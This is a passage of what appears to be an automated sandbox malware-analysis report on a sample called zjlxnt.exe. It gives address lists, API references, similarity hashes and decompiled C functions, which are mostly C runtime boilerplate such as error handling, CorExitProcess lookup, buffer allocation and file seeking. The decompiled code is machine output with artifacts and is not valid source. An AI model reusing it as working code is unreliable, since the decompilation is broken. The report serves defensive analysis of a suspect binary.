                                                          0x00402418
                                                          0x0040242b
                                                          0x00402432
                                                          0x00402434
                                                          0x00402438
                                                          0x00402451
                                                          0x00402451
                                                          0x0040243a
                                                          0x0040243c
                                                          0x0040244f
                                                          0x00402456
                                                          0x0040245f
                                                          0x00402462
                                                          0x00402465
                                                          0x00402479
                                                          0x00402479
                                                          0x00402482
                                                          0x00402467
                                                          0x0040246e
                                                          0x00402474
                                                          0x00402477
                                                          0x0040248b
                                                          0x0040248d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402477
                                                          0x00402490
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040244f
                                                          0x0040243c
                                                          0x00402498
                                                          0x004024a2
                                                          0x0040241a
                                                          0x0040241c
                                                          0x0040241c

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00402408,004020DC,00401948), ref: 0040241F
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040242D
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00402446
                                                          • SetLastError.KERNEL32(00000000,00402408,004020DC,00401948), ref: 00402498
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 684fce33a2afe8652c06ef2917e87edb54eca84d7017755fe4f2d0745960b01c
                                                          • Instruction ID: 8cbd38a898f6fb395fa32175277b1369e61c4e3f8d2db3b60c7e08ca7fe3f351
                                                          • Opcode Fuzzy Hash: 684fce33a2afe8652c06ef2917e87edb54eca84d7017755fe4f2d0745960b01c
                                                          • Instruction Fuzzy Hash: 770124325093226EE62467B5AE8DAAB3F56EB08378721423FF914B12F1EFF94C05514C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00408EFC(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                          				void* _t15;
                                                          				void* _t16;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t40;
                                                          				intOrPtr _t41;
                                                          
                                                          				_t40 = _a4;
                                                          				if(_t40 != 0) {
                                                          					if( *_t40 != 0) {
                                                          						_t15 = E00409A30(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                          						if(_t15 != 0) {
                                                          							_t38 = _a8;
                                                          							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
                                                          								L10:
                                                          								_t16 = E00408D53(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
                                                          								if(_t16 != 0) {
                                                          									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
                                                          									_t18 = 0;
                                                          								} else {
                                                          									E00407B10(GetLastError());
                                                          									_t18 =  *((intOrPtr*)(E00407B6A()));
                                                          								}
                                                          								L13:
                                                          								L14:
                                                          								return _t18;
                                                          							}
                                                          							_t18 = E00408FBE(_t38, _t15);
                                                          							if(_t18 != 0) {
                                                          								goto L13;
                                                          							}
                                                          							goto L10;
                                                          						}
                                                          						E00407B10(GetLastError());
                                                          						_t18 =  *((intOrPtr*)(E00407B6A()));
                                                          						goto L14;
                                                          					}
                                                          					_t41 = _a8;
                                                          					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
                                                          						L5:
                                                          						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
                                                          						_t18 = 0;
                                                          						 *((intOrPtr*)(_t41 + 0x10)) = 0;
                                                          						goto L14;
                                                          					}
                                                          					_t18 = E00408FBE(_t41, 1);
                                                          					if(_t18 != 0) {
                                                          						goto L14;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          				E00408FE5(_a8);
                                                          				return 0;
                                                          			}









                                                          0x00408f02
                                                          0x00408f07
                                                          0x00408f1e
                                                          0x00408f50
                                                          0x00408f5a
                                                          0x00408f73
                                                          0x00408f79
                                                          0x00408f87
                                                          0x00408f94
                                                          0x00408f9b
                                                          0x00408fb4
                                                          0x00408fb7
                                                          0x00408f9d
                                                          0x00408fa4
                                                          0x00408faf
                                                          0x00408faf
                                                          0x00408fb9
                                                          0x00408fba
                                                          0x00000000
                                                          0x00408fba
                                                          0x00408f7e
                                                          0x00408f85
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f85
                                                          0x00408f63
                                                          0x00408f6e
                                                          0x00000000
                                                          0x00408f6e
                                                          0x00408f20
                                                          0x00408f26
                                                          0x00408f39
                                                          0x00408f3c
                                                          0x00408f3e
                                                          0x00408f40
                                                          0x00000000
                                                          0x00408f40
                                                          0x00408f2c
                                                          0x00408f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f33
                                                          0x00408f0c
                                                          0x00000000

                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\zjlxnt.exe, xrefs: 00408F18
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\zjlxnt.exe
                                                          • API String ID: 0-4131390187
                                                          • Opcode ID: 638bf804aa9e11a3a9ed9b700c92c7b04de1b824e523500f8c48dab4bc0f804a
                                                          • Instruction ID: 20814d24466359e2355320ce1a3709a5b694d9d3995fe727daaa17cac18d48d2
                                                          • Opcode Fuzzy Hash: 638bf804aa9e11a3a9ed9b700c92c7b04de1b824e523500f8c48dab4bc0f804a
                                                          • Instruction Fuzzy Hash: AE218331604116AFDB10AF718A4086BB76AAF44368710853EF995B72D1EF38EC418799
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 25%
                                                          			E00405907(intOrPtr _a4) {
                                                          				char _v16;
                                                          				signed int _v20;
                                                          				signed int _t11;
                                                          				int _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				int _t22;
                                                          				signed int _t23;
                                                          
                                                          				_t11 =  *0x418014; // 0xb25f2588
                                                          				 *[fs:0x0] =  &_v16;
                                                          				_v20 = _v20 & 0x00000000;
                                                          				_t14 =  &_v20;
                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x410e5f, 0xffffffff);
                                                          				if(_t14 != 0) {
                                                          					_t14 = GetProcAddress(_v20, "CorExitProcess");
                                                          					_t22 = _t14;
                                                          					if(_t22 != 0) {
                                                          						 *0x4111f0(_a4);
                                                          						_t14 =  *_t22();
                                                          					}
                                                          				}
                                                          				if(_v20 != 0) {
                                                          					_t14 = FreeLibrary(_v20);
                                                          				}
                                                          				 *[fs:0x0] = _v16;
                                                          				return _t14;
                                                          			}











                                                          0x0040591c
                                                          0x00405927
                                                          0x0040592d
                                                          0x00405931
                                                          0x0040593c
                                                          0x00405944
                                                          0x0040594e
                                                          0x00405954
                                                          0x00405958
                                                          0x0040595f
                                                          0x00405965
                                                          0x00405965
                                                          0x00405958
                                                          0x0040596b
                                                          0x00405970
                                                          0x00405970
                                                          0x00405979
                                                          0x00405983

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B25F2588,00416678,?,00000000,00410E5F,000000FF,?,004058E3,FFFFFFFE,?,004058B7,?), ref: 0040593C
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040594E
                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00410E5F,000000FF,?,004058E3,FFFFFFFE,?,004058B7,?), ref: 00405970
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: b85781b925cd3f6e4a9e5fac7271b78291b87634337c369aaa8fc80064bd98db
                                                          • Instruction ID: 0c8a8b7403f6a5ffc10fc8bc87357ce44426d05b1674744c2793e53712d4bdfd
                                                          • Opcode Fuzzy Hash: b85781b925cd3f6e4a9e5fac7271b78291b87634337c369aaa8fc80064bd98db
                                                          • Instruction Fuzzy Hash: DA01A771900619EBDB118F50DC05BEFBBB9FB08B54F004536EA11A26E0DB789900CE94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E0040DA04(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                          				signed int _v8;
                                                          				intOrPtr _v12;
                                                          				void* _v24;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t40;
                                                          				intOrPtr _t45;
                                                          				signed int _t48;
                                                          				void* _t51;
                                                          				signed int _t55;
                                                          				intOrPtr _t64;
                                                          				intOrPtr _t69;
                                                          				void* _t72;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t89;
                                                          				void* _t90;
                                                          				intOrPtr* _t92;
                                                          				void* _t94;
                                                          				intOrPtr* _t95;
                                                          				signed int _t96;
                                                          				void* _t97;
                                                          				intOrPtr* _t98;
                                                          				intOrPtr* _t100;
                                                          				void* _t103;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t40 =  *0x418014; // 0xb25f2588
                                                          				_v8 = _t40 ^ _t96;
                                                          				_t89 = _a20;
                                                          				if(_t89 > 0) {
                                                          					_t69 = E0040E7A2(_a16, _t89);
                                                          					_t103 = _t69 - _t89;
                                                          					_t4 = _t69 + 1; // 0x1
                                                          					_t89 = _t4;
                                                          					if(_t103 >= 0) {
                                                          						_t89 = _t69;
                                                          					}
                                                          				}
                                                          				_t71 = _a32;
                                                          				if(_a32 == 0) {
                                                          					_t71 =  *((intOrPtr*)( *_a4 + 8));
                                                          					_a32 =  *((intOrPtr*)( *_a4 + 8));
                                                          				}
                                                          				_t45 = E00409976(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
                                                          				_t98 = _t97 + 0x18;
                                                          				_v12 = _t45;
                                                          				if(_t45 == 0) {
                                                          					L38:
                                                          					_pop(_t90);
                                                          					_pop(_t94);
                                                          					_pop(_t72);
                                                          					return E00401BE5(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
                                                          				} else {
                                                          					_t16 = _t45 + _t45 + 8; // 0x8
                                                          					asm("sbb eax, eax");
                                                          					_t48 = _t45 + _t45 & _t16;
                                                          					if(_t48 == 0) {
                                                          						_t95 = 0;
                                                          						L36:
                                                          						_t73 = 0;
                                                          						L37:
                                                          						E0040A7F2(_t95);
                                                          						_t45 = _t73;
                                                          						goto L38;
                                                          					}
                                                          					if(_t48 > 0x400) {
                                                          						_t95 = E0040A6A3(_t48);
                                                          						if(_t95 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						 *_t95 = 0xdddd;
                                                          						L12:
                                                          						if(_t95 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t51 = E00409976(_t71, 1, _a16, _t89, _t95, _v12);
                                                          						_t100 = _t98 + 0x18;
                                                          						if(_t51 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t91 = _v12;
                                                          						_t73 = E0040AF6A(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
                                                          						if(_t73 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						if((_a12 & 0x00000400) == 0) {
                                                          							_t30 = _t73 + _t73 + 8; // 0x8
                                                          							asm("sbb eax, eax");
                                                          							_t55 = _t73 + _t73 & _t30;
                                                          							if(_t55 == 0) {
                                                          								_t92 = 0;
                                                          								L34:
                                                          								E0040A7F2(_t92);
                                                          								goto L36;
                                                          							}
                                                          							if(_t55 > 0x400) {
                                                          								_t92 = E0040A6A3(_t55);
                                                          								if(_t92 == 0) {
                                                          									goto L34;
                                                          								}
                                                          								 *_t92 = 0xdddd;
                                                          								L26:
                                                          								_t92 = _t92 + 8;
                                                          								if(_t92 == 0 || E0040AF6A(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
                                                          									goto L34;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(0);
                                                          									if(_a28 != 0) {
                                                          										_push(_a28);
                                                          										_push(_a24);
                                                          									} else {
                                                          										_push(0);
                                                          										_push(0);
                                                          									}
                                                          									_push(_t73);
                                                          									_push(_t92);
                                                          									_push(0);
                                                          									_push(_a32);
                                                          									_t73 = E00409A30();
                                                          									if(_t73 == 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										E0040A7F2(_t92);
                                                          										goto L37;
                                                          									}
                                                          								}
                                                          							}
                                                          							E00410C20(_t55);
                                                          							_t92 = _t100;
                                                          							if(_t92 == 0) {
                                                          								goto L34;
                                                          							}
                                                          							 *_t92 = 0xcccc;
                                                          							goto L26;
                                                          						}
                                                          						_t64 = _a28;
                                                          						if(_t64 == 0) {
                                                          							goto L37;
                                                          						}
                                                          						if(_t73 > _t64) {
                                                          							goto L36;
                                                          						}
                                                          						_t73 = E0040AF6A(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
                                                          						if(_t73 != 0) {
                                                          							goto L37;
                                                          						}
                                                          						goto L36;
                                                          					}
                                                          					E00410C20(_t48);
                                                          					_t95 = _t98;
                                                          					if(_t95 == 0) {
                                                          						goto L36;
                                                          					}
                                                          					 *_t95 = 0xcccc;
                                                          					goto L12;
                                                          				}
                                                          			}




























                                                          0x0040da09
                                                          0x0040da0a
                                                          0x0040da0b
                                                          0x0040da12
                                                          0x0040da18
                                                          0x0040da1d
                                                          0x0040da23
                                                          0x0040da29
                                                          0x0040da2c
                                                          0x0040da2c
                                                          0x0040da2f
                                                          0x0040da31
                                                          0x0040da31
                                                          0x0040da2f
                                                          0x0040da33
                                                          0x0040da38
                                                          0x0040da3f
                                                          0x0040da42
                                                          0x0040da42
                                                          0x0040da5e
                                                          0x0040da63
                                                          0x0040da66
                                                          0x0040da6b
                                                          0x0040dbe1
                                                          0x0040dbe4
                                                          0x0040dbe5
                                                          0x0040dbe6
                                                          0x0040dbf2
                                                          0x0040da71
                                                          0x0040da73
                                                          0x0040da78
                                                          0x0040da7a
                                                          0x0040da7c
                                                          0x0040dbd4
                                                          0x0040dbd6
                                                          0x0040dbd6
                                                          0x0040dbd8
                                                          0x0040dbd9
                                                          0x0040dbdf
                                                          0x00000000
                                                          0x0040dbdf
                                                          0x0040da87
                                                          0x0040daa6
                                                          0x0040daab
                                                          0x00000000
                                                          0x00000000
                                                          0x0040dab1
                                                          0x0040dab7
                                                          0x0040dabc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040dacd
                                                          0x0040dad2
                                                          0x0040dad7
                                                          0x00000000
                                                          0x00000000
                                                          0x0040dadd
                                                          0x0040daf4
                                                          0x0040daf8
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db06
                                                          0x0040db43
                                                          0x0040db48
                                                          0x0040db4a
                                                          0x0040db4c
                                                          0x0040dbc9
                                                          0x0040dbcb
                                                          0x0040dbcc
                                                          0x00000000
                                                          0x0040dbd1
                                                          0x0040db50
                                                          0x0040db6b
                                                          0x0040db70
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db72
                                                          0x0040db78
                                                          0x0040db78
                                                          0x0040db7d
                                                          0x00000000
                                                          0x0040db99
                                                          0x0040db9b
                                                          0x0040db9c
                                                          0x0040dba0
                                                          0x0040dbc1
                                                          0x0040dbc4
                                                          0x0040dba2
                                                          0x0040dba2
                                                          0x0040dba3
                                                          0x0040dba3
                                                          0x0040dba4
                                                          0x0040dba5
                                                          0x0040dba6
                                                          0x0040dba7
                                                          0x0040dbaf
                                                          0x0040dbb6
                                                          0x00000000
                                                          0x0040dbb8
                                                          0x0040dbb9
                                                          0x00000000
                                                          0x0040dbbe
                                                          0x0040dbb6
                                                          0x0040db7d
                                                          0x0040db52
                                                          0x0040db57
                                                          0x0040db5b
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db5d
                                                          0x00000000
                                                          0x0040db5d
                                                          0x0040db08
                                                          0x0040db0d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db15
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db31
                                                          0x0040db35
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040db3b
                                                          0x0040da89
                                                          0x0040da8e
                                                          0x0040da92
                                                          0x00000000
                                                          0x00000000
                                                          0x0040da98
                                                          0x00000000
                                                          0x0040da98

                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 0040DA89
                                                          • __alloca_probe_16.LIBCMT ref: 0040DB52
                                                          • __freea.LIBCMT ref: 0040DBB9
                                                            • Part of subcall function 0040A6A3: HeapAlloc.KERNEL32(00000000,00409475,?,?,00409475,00000220,?,00000000,?), ref: 0040A6D5
                                                          • __freea.LIBCMT ref: 0040DBCC
                                                          • __freea.LIBCMT ref: 0040DBD9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                          • String ID:
                                                          • API String ID: 1096550386-0
                                                          • Opcode ID: 82afe60a9887c0abd65ff5de17f291167fb994eb203d4a956d5339fce2fd6815
                                                          • Instruction ID: 5d70aef8a5c4d59e68ccac4d83b3032b04bfc896b12cb9bc470d8a1540507576
                                                          • Opcode Fuzzy Hash: 82afe60a9887c0abd65ff5de17f291167fb994eb203d4a956d5339fce2fd6815
                                                          • Instruction Fuzzy Hash: E551F572A0020A6BDB205EA58C81EBB37B9EF44314B16453EFD05F6281FB7CEC548669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E004042F7(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                          				signed int _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _t78;
                                                          				signed int _t80;
                                                          				char _t81;
                                                          				intOrPtr* _t82;
                                                          				void* _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				void* _t92;
                                                          				void* _t93;
                                                          				intOrPtr _t96;
                                                          				signed char _t100;
                                                          				signed char _t103;
                                                          				signed char _t109;
                                                          				intOrPtr _t110;
                                                          				intOrPtr _t114;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t117;
                                                          				intOrPtr _t118;
                                                          				intOrPtr _t124;
                                                          				signed int _t125;
                                                          				signed int _t126;
                                                          				signed int _t130;
                                                          				signed int _t131;
                                                          				intOrPtr _t135;
                                                          				intOrPtr _t136;
                                                          				intOrPtr _t139;
                                                          				intOrPtr _t140;
                                                          
                                                          				_t1 =  &_a4; // 0x40474b
                                                          				_t78 = E004065AB( *_t1);
                                                          				_v36 = _t78;
                                                          				_t130 = _t78 >> 6;
                                                          				_t80 = (_t78 & 0x0000003f) * 0x38;
                                                          				_v40 = _t130;
                                                          				_t117 =  *((intOrPtr*)(0x418ec0 + _t130 * 4));
                                                          				_v32 = _t117;
                                                          				_v28 = _t80;
                                                          				_v16 = 0;
                                                          				_t81 =  *((intOrPtr*)(_t117 + _t80 + 0x29));
                                                          				_v24 = _t81;
                                                          				if(_t81 != 1) {
                                                          					_v12 = 1;
                                                          				} else {
                                                          					_t140 = 2;
                                                          					_v12 = _t140;
                                                          				}
                                                          				_t82 = _a4;
                                                          				_t118 =  *((intOrPtr*)(_t82 + 8));
                                                          				_v20 = _t118;
                                                          				if(_t118 != 0) {
                                                          					_t135 = _v32;
                                                          					asm("cdq");
                                                          					_v8 = _t130;
                                                          					asm("cdq");
                                                          					_t122 =  *_t82 -  *((intOrPtr*)(_t82 + 4)) + _v20;
                                                          					_t85 = _v8;
                                                          					_v20 =  *_t82 -  *((intOrPtr*)(_t82 + 4)) + _v20;
                                                          					asm("adc eax, edx");
                                                          					_t131 = _v28;
                                                          					__eflags =  *((char*)(_t135 + _t131 + 0x28));
                                                          					_t136 = _v12;
                                                          					if( *((char*)(_t135 + _t131 + 0x28)) < 0) {
                                                          						_t137 = _v36;
                                                          						_t86 = E004068B6(_v36, 0, 0, 2, _a24);
                                                          						__eflags = _t86 - _a8;
                                                          						if(_t86 != _a8) {
                                                          							L14:
                                                          							_t88 = E004068B6(_t137, _a8, _a12, 0, _a24) & _t131;
                                                          							_t131 = _t131 | 0xffffffff;
                                                          							__eflags = _t88 - _t131;
                                                          							if(_t88 != _t131) {
                                                          								__eflags = _v8;
                                                          								if(__eflags > 0) {
                                                          									L22:
                                                          									asm("cdq");
                                                          									_v8 =  *((intOrPtr*)(_a4 + 0x18));
                                                          									L23:
                                                          									_t91 = _v28;
                                                          									_t124 =  *((intOrPtr*)(0x418ec0 + _v40 * 4));
                                                          									__eflags =  *(_t91 + _t124 + 0x28) & 0x00000004;
                                                          									if(( *(_t91 + _t124 + 0x28) & 0x00000004) == 0) {
                                                          										_t125 = _v8;
                                                          										L29:
                                                          										_t114 = _v12;
                                                          										_t92 = E00410B40(_t125, _t131, _t114, _v16);
                                                          										_push(_v16);
                                                          										L30:
                                                          										_push(_t114);
                                                          										_push(_a20);
                                                          										_push(_a16);
                                                          										_t93 = E00410B40();
                                                          										asm("sbb edx, edi");
                                                          										asm("adc edx, [ebp+0x10]");
                                                          										return _t93 - _t92 + _a8;
                                                          									}
                                                          									_t96 = _v24;
                                                          									__eflags = _t96 - 1;
                                                          									if(_t96 == 1) {
                                                          										L26:
                                                          										_push(2);
                                                          										_pop(1);
                                                          										L27:
                                                          										_t126 = _v8;
                                                          										L13:
                                                          										_t125 = _t126 + 1;
                                                          										asm("adc edx, edi");
                                                          										goto L29;
                                                          									}
                                                          									__eflags = _t96 - 2;
                                                          									if(_t96 != 2) {
                                                          										goto L27;
                                                          									}
                                                          									goto L26;
                                                          								}
                                                          								_v8 = 0x200;
                                                          								if(__eflags < 0) {
                                                          									L19:
                                                          									_t100 =  *(_a4 + 0xc) >> 6;
                                                          									__eflags = 1 & _t100;
                                                          									if((1 & _t100) == 0) {
                                                          										goto L22;
                                                          									}
                                                          									_t103 =  *(_a4 + 0xc) >> 8;
                                                          									__eflags = 1 & _t103;
                                                          									if((1 & _t103) != 0) {
                                                          										goto L22;
                                                          									}
                                                          									_t131 = 0;
                                                          									goto L23;
                                                          								}
                                                          								__eflags = _v20 - 0x200;
                                                          								if(_v20 > 0x200) {
                                                          									goto L22;
                                                          								}
                                                          								goto L19;
                                                          							}
                                                          							return _t131;
                                                          						}
                                                          						__eflags = _t131 - _a12;
                                                          						if(_t131 != _a12) {
                                                          							goto L14;
                                                          						}
                                                          						_t139 = _a4;
                                                          						_t125 = E0040466D( *((intOrPtr*)(_t139 + 4)), _v20 +  *((intOrPtr*)(_t139 + 4)), _v24) + _v20;
                                                          						asm("adc edx, [ebp-0x4]");
                                                          						_t109 =  *(_t139 + 0xc) >> 5;
                                                          						__eflags = 1 & _t109;
                                                          						if((1 & _t109) == 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t110 = _v24;
                                                          						__eflags = _t110 - 1;
                                                          						if(_t110 == 1) {
                                                          							L12:
                                                          							_push(2);
                                                          							_pop(1);
                                                          							goto L13;
                                                          						}
                                                          						__eflags = _t110 - 2;
                                                          						if(_t110 != 2) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t115 = _v16;
                                                          					_t92 = E00410B40(_t122, _t85, _t136, _t115);
                                                          					_push(_t115);
                                                          					_t114 = _t136;
                                                          					goto L30;
                                                          				} else {
                                                          					return _a8;
                                                          				}
                                                          			}







































                                                          0x00404302
                                                          0x00404305
                                                          0x0040430c
                                                          0x00404312
                                                          0x00404315
                                                          0x0040431c
                                                          0x0040431f
                                                          0x00404328
                                                          0x0040432b
                                                          0x0040432e
                                                          0x00404331
                                                          0x00404335
                                                          0x0040433a
                                                          0x00404344
                                                          0x0040433c
                                                          0x0040433e
                                                          0x0040433f
                                                          0x0040433f
                                                          0x00404347
                                                          0x0040434a
                                                          0x0040434d
                                                          0x00404352
                                                          0x00404364
                                                          0x00404369
                                                          0x0040436c
                                                          0x00404372
                                                          0x00404373
                                                          0x00404375
                                                          0x00404378
                                                          0x0040437b
                                                          0x0040437d
                                                          0x00404383
                                                          0x00404388
                                                          0x0040438b
                                                          0x004043a4
                                                          0x004043ac
                                                          0x004043b4
                                                          0x004043b7
                                                          0x00404404
                                                          0x00404414
                                                          0x00404419
                                                          0x0040441c
                                                          0x0040441e
                                                          0x00404427
                                                          0x0040442a
                                                          0x0040445b
                                                          0x00404461
                                                          0x00404462
                                                          0x00404465
                                                          0x00404468
                                                          0x0040446b
                                                          0x00404472
                                                          0x00404477
                                                          0x0040448f
                                                          0x00404492
                                                          0x00404495
                                                          0x0040449b
                                                          0x004044a0
                                                          0x004044a3
                                                          0x004044a3
                                                          0x004044a4
                                                          0x004044ab
                                                          0x004044ae
                                                          0x004044b5
                                                          0x004044ba
                                                          0x00000000
                                                          0x004044ba
                                                          0x00404479
                                                          0x0040447c
                                                          0x0040447e
                                                          0x00404484
                                                          0x00404484
                                                          0x00404486
                                                          0x00404487
                                                          0x00404487
                                                          0x004043fb
                                                          0x004043fb
                                                          0x004043fd
                                                          0x00000000
                                                          0x004043fd
                                                          0x00404480
                                                          0x00404482
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404482
                                                          0x00404431
                                                          0x00404434
                                                          0x0040443b
                                                          0x00404442
                                                          0x00404445
                                                          0x00404447
                                                          0x00000000
                                                          0x00000000
                                                          0x00404450
                                                          0x00404453
                                                          0x00404455
                                                          0x00000000
                                                          0x00000000
                                                          0x00404457
                                                          0x00000000
                                                          0x00404457
                                                          0x00404436
                                                          0x00404439
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404439
                                                          0x00000000
                                                          0x00404420
                                                          0x004043b9
                                                          0x004043bc
                                                          0x00000000
                                                          0x00000000
                                                          0x004043be
                                                          0x004043d8
                                                          0x004043de
                                                          0x004043e2
                                                          0x004043e5
                                                          0x004043e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004043ed
                                                          0x004043f0
                                                          0x004043f2
                                                          0x004043f8
                                                          0x004043f8
                                                          0x004043fa
                                                          0x00000000
                                                          0x004043fa
                                                          0x004043f4
                                                          0x004043f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004043f6
                                                          0x0040438d
                                                          0x00404394
                                                          0x00404399
                                                          0x0040439a
                                                          0x00000000
                                                          0x00404354
                                                          0x00000000
                                                          0x00404357

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00404394
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040449B
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004044AE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
